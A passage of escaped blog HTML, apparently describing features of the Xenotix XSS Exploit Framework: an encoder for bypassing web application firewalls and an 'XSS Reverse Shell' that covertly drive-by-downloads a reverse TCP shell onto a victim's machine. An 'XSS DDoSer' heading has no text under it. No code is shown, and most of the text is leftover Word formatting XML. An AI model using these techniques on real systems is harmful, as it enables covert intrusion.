&lt;/b&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;
&lt;/b&gt;&lt;span style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;/span&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;The
inbuilt Encoder will allow encoding into different forms to bypass various
filters and Web Application Firewalls. The encoder supports Base64 Encoding,
URL Encoding, HEX Encoding, HTML Characters Conversion, Character Code
Conversion and IP to Dword, Hex and Octal conversions.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;
&lt;/span&gt;&lt;/span&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;

&lt;/span&gt;&lt;/div&gt;
&lt;h4 class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;XSS Reverse Shell&lt;/span&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;A
XSS Reverse Shell can be implemented with Xenotix XSS Exploit Framework. This
is made possible with the help of Java Drive-By. The XSS vulnerable web
application exploited with the injectable scripts generated by XSS Reverse
Shell when presented to a victim will initiate the drive by download of a
Reverse TCP connecting shell. After the drive-by download, the reverse shell is
executed by the same method used in Java Drive-by.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i49.tinypic.com/11147li.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://i49.tinypic.com/11147li.png" height="182" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&amp;nbsp;

&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;The
advantage of this method is that the reverse shell is downloaded and executed
in the victim’s system without his knowledge. But for the execution of reverse
shell, it will pop up a UAC dialog requesting for the permission to run the
executable. The tool is having an inbuilt Listener that listens to the reverse
shell. It is designed in a user friendly manner. All you have to do is to
specify the reverse connection IP and port.&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;span style="mso-spacerun: yes;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;span style="mso-spacerun: yes;"&gt;

&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;o:OfficeDocumentSettings&gt;
  &lt;o:RelyOnVML/&gt;
  &lt;o:AllowPNG/&gt;
 &lt;/o:OfficeDocumentSettings&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:TrackMoves/&gt;
  &lt;w:TrackFormatting/&gt;
  &lt;w:PunctuationKerning/&gt;
  &lt;w:ValidateAgainstSchemas/&gt;
  &lt;w:SaveIfXMLInvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;
  &lt;w:IgnoreMixedContent&gt;false&lt;/w:IgnoreMixedContent&gt;
  &lt;w:AlwaysShowPlaceholderText&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;
  &lt;w:DoNotPromoteQF/&gt;
  &lt;w:LidThemeOther&gt;EN-US&lt;/w:LidThemeOther&gt;
  &lt;w:LidThemeAsian&gt;X-NONE&lt;/w:LidThemeAsian&gt;
  &lt;w:LidThemeComplexScript&gt;X-NONE&lt;/w:LidThemeComplexScript&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
   &lt;w:DontGrowAutofit/&gt;
   &lt;w:SplitPgBreakAndParaMark/&gt;
   &lt;w:DontVertAlignCellWithSp/&gt;
   &lt;w:DontBreakConstrainedForcedTables/&gt;
   &lt;w:DontVertAlignInTxbx/&gt;
   &lt;w:Word11KerningPairs/&gt;
   &lt;w:CachedColBalance/&gt;
  &lt;/w:Compatibility&gt;
  &lt;m:mathPr&gt;
   &lt;m:mathFont m:val="Cambria Math"/&gt;
   &lt;m:brkBin m:val="before"/&gt;
   &lt;m:brkBinSub m:val="--"/&gt;
   &lt;m:smallFrac m:val="off"/&gt;
   &lt;m:dispDef/&gt;
   &lt;m:lMargin m:val="0"/&gt;
   &lt;m:rMargin m:val="0"/&gt;
   &lt;m:defJc m:val="centerGroup"/&gt;
   &lt;m:wrapIndent m:val="1440"/&gt;
   &lt;m:intLim m:val="subSup"/&gt;
   &lt;m:naryLim m:val="undOvr"/&gt;
  &lt;/m:mathPr&gt;&lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
  LatentStyleCount="267"&gt;
  &lt;w:LsdException Locked="false" Priority="0" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Normal"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 7"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 8"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 9"/&gt;
  &lt;w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/&gt;
  &lt;w:LsdException Locked="false" Priority="10" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Title"/&gt;
  &lt;w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/&gt;
  &lt;w:LsdException Locked="false" Priority="11" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/&gt;
  &lt;w:LsdException Locked="false" Priority="22" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Strong"/&gt;
  &lt;w:LsdException Locked="false" Priority="20" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/&gt;
  &lt;w:LsdException Locked="false" Priority="59" SemiHidden="false"
   UnhideWhenUsed="false" Name="Table Grid"/&gt;
  &lt;w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/&gt;
  &lt;w:LsdException Locked="false" Priority="1" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/&gt;
  &lt;w:LsdException Locked="false" Priority="34" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/&gt;
  &lt;w:LsdException Locked="false" Priority="29" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Quote"/&gt;
  &lt;w:LsdException Locked="false" Priority="30" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="19" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/&gt;
  &lt;w:LsdException Locked="false" Priority="21" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/&gt;
  &lt;w:LsdException Locked="false" Priority="31" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/&gt;
  &lt;w:LsdException Locked="false" Priority="32" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/&gt;
  &lt;w:LsdException Locked="false" Priority="33" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/&gt;
  &lt;w:LsdException Locked="false" Priority="37" Name="Bibliography"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/&gt;
 &lt;/w:LatentStyles&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:"Table Normal";
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-priority:99;
 mso-style-qformat:yes;
 mso-style-parent:"";
 mso-padding-alt:0in 5.4pt 0in 5.4pt;
 mso-para-margin-top:0in;
 mso-para-margin-right:0in;
 mso-para-margin-bottom:8.0pt;
 mso-para-margin-left:0in;
 line-height:107%;
 mso-pagination:widow-orphan;
 font-size:11.0pt;
 font-family:"Calibri","sans-serif";
 mso-ascii-font-family:Calibri;
 mso-ascii-theme-font:minor-latin;
 mso-hansi-font-family:Calibri;
 mso-hansi-theme-font:minor-latin;
 mso-bidi-font-family:"Times New Roman";
 mso-bidi-theme-font:minor-bidi;}
&lt;/style&gt;
&lt;![endif]--&gt;

&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;[VIDEO] &lt;a href="https://www.youtube.com/watch?v=IT-8IH3yRrA"&gt;https://www.youtube.com/watch?v=IT-8IH3yRrA&lt;/a&gt; [/VIDEO]&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h4&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 14.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 11.0pt; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;XSS DDoSer&lt;/span&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;h4&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 14.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 11.0pt; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;span style="mso-spacerun: yes;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://oi49.tinypic.com/sb0ro7.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://oi49.tinypic.com/sb0ro7.jpg" height="92" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
